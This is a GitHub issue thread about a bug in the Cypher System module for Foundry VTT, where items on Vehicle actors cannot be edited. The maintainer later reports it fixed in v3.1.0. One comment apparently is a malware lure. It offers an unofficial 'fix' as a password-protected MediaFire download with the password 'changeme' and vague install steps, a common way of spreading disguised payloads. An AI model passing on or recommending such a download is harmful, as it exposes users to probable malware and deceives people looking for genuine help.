### ISSUE TITLE
Vehicle Item Editing Bug

### ISSUE THREAD

**Issue by RogueFirefly57** [mrkwnzl/cyphersystem-foundryvtt#370]
**Describe the bug**  
Can no longer edit items or open item sheets for Vehicle Actors.

**Steps to reproduce the behavior**  
1. Go to Actors tab
2. Click on the Create Actor button and create a Vehicle Actor
3. Switch over to the Storage Tab and Create an Item, then try to edit or name the item

**Expected behavior**  
I should be able to edit items, sorry that I don't have more to add

**Screenshots**  
N/A

**Setup**  
 - Cypher System Version: 3.0.0
 - Foundry VTT Version: Version 12 Build 331
 - Native App

**Additional context**

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mrkwnzl** [comment]
Thanks for reporting. I have a fix for that in the next version, which I can release hopefully this weekend.

**Comment by mrkwnzl** [comment]
Fixed in v3.1.0
